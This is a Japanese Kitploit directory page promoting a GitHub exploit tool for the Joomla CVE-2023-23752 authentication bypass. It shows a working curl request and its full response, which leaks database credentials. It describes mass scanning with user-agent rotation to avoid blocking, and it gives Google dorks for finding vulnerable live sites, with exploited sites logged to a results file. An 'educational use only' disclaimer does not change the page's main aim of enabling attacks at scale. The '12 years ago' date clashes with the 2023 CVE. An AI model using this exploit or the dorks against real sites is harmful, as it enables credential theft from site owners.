Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-23752 — CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7) 向けのエクスプロイト。 | Kitploit
ツール/GitHubGitHub/pushkarup/cve-2023-23752
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト認証
GitHubpushkarup/cve-2023-23752

CVE-2023-23752

CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7) 向けのエクスプロイト。

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23752

CVE-2023-23752 のエクスプロイト (4.0.0 <= Joomla <= 4.2.7)。

はじめに

議論されたように、CVE-2023-23752 は認証バイパスによる情報漏洩です。公開されているエクスプロイトのほとんどは、このバイパスを利用してシステムの設定を漏洩させます。設定には Joomla! MySQL データベースの資格情報が平文で含まれています。以下に漏洩の例を示します。

root@kitploit:~
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
*   Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}

上記の概念実証では、サーバーは root:labpass1 という資格情報で応答しています。これはテスト用の Joomla! MySQL アカウントの資格情報です。しかし、テスト用 MySQL サーバーは 127.0.0.1 にバインドされていたため、リモートの攻撃者はサーバーにアクセスできず、資格情報はほとんど無価値であることに注意することが重要です。MySQL を localhost にバインドするのが最も一般的な設定であり、この資格情報漏洩の影響を大幅に制限します。

免責事項:教育目的のみ

このエクスプロイトおよび概念実証(PoC)は、教育および情報提供のみを目的として公開されています。これを共有する意図は、管理された環境で潜在的な脆弱性を示すことです。目的はサイバーセキュリティの概念への理解を促進し、責任ある開示を奨励することです。

重要なポイント:

  • 倫理的使用: このエクスプロイトおよびPoCは、明示的な許可がある環境およびシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。
  • 責任ある開示: このエクスプロイトおよびPoCの結果として脆弱性を発見した場合は、関係者に責任を持って報告し、問題に対処・軽減するための十分な時間を与えることを強く推奨します。
  • 推奨ではありません: このPoCおよび関連資料は、いかなる形の不正アクセス、ハッキング、またはその他の違法行為を推奨または奨励するものではありません。

このエクスプロイトおよびPoCにアクセスして使用することにより、あなたは自身の行動に対して単独で責任を負い、適用法令に従ってこの情報を使用することに同意するものとします。作者は、教育および責任ある開示以外の目的でこのPoCを使用したことによる誤用または結果について一切の責任を負いません。

エクスプロイトの機能

  • シングルスキャン: 単一サイトのエクスプロイトをスキャンします。
  • マススキャン: ファイルからサイトのリストをエクスプロイト対象としてスキャンします。
  • 非同期スレッド処理: 高速処理のためにスレッドを使用します。
  • 動的スロットリング: リクエスト過多によるブロックを避けるために、動的なリクエストスロットリング技術を実装しています。
  • 結果の要約: スキャン終了時に結果を要約し、成功スキャン、失敗スキャン、検出された問題に関するデータを提供します。
  • 入力検証: ユーザー入力、特にファイルからの入力が正しく構造化され、正当なURLを含んでいることを確認するための入力検証を実装しています。
  • ユーザーエージェントのローテーション: リクエストごとにUser-Agentヘッダーをローテーションし、異なるブラウザを模倣してブロックされる可能性を低減します。

始め方

前提条件

  • Python 3.x
  • 必要なPythonパッケージ: requests, colorama , urllib3 , fake_useragent , aio-http

インストール

  1. リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/Pushkarup/CVE-2023-23752.git
    cd CVE-2023-23752
    
  2. 必要なPythonパッケージをインストールします:

    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

  1. 対象サイトを1行に1つ含むテキストファイルを作成し、.txt 拡張子で保存します。

    • テスト用のサイトリストを収集するには、次のdorkを使用します: inurl:/api/index.php/v1/config/application?public=true , intitle:"Index of" /api/index.php/v1/config/application?public=true , filetype:php inurl:/api/index.php/v1/config/application?public=true , intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"
  2. スクリプトを実行します:

    root@kitploit:~
    python joomla.py
    
  3. スクリプトが完了するまで実行し、指示に従います。

  4. エクスプロイトされたすべてのサイトは Results.txt に保存されます。

貢献

貢献を歓迎します!問題を見つけた場合や改善点がある場合は、プルリクエストを開くか、Issueを作成してください。

ライセンス

このプロジェクトは MITライセンス の下でライセンスされています。

連絡先

  • GitHub: Pushkar Upadhyay
  • LinkedIn: Pushkar Upadhyay

寄付

サポートをお願いします

  • BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
  • ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
  • USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a
ツールをダウンロード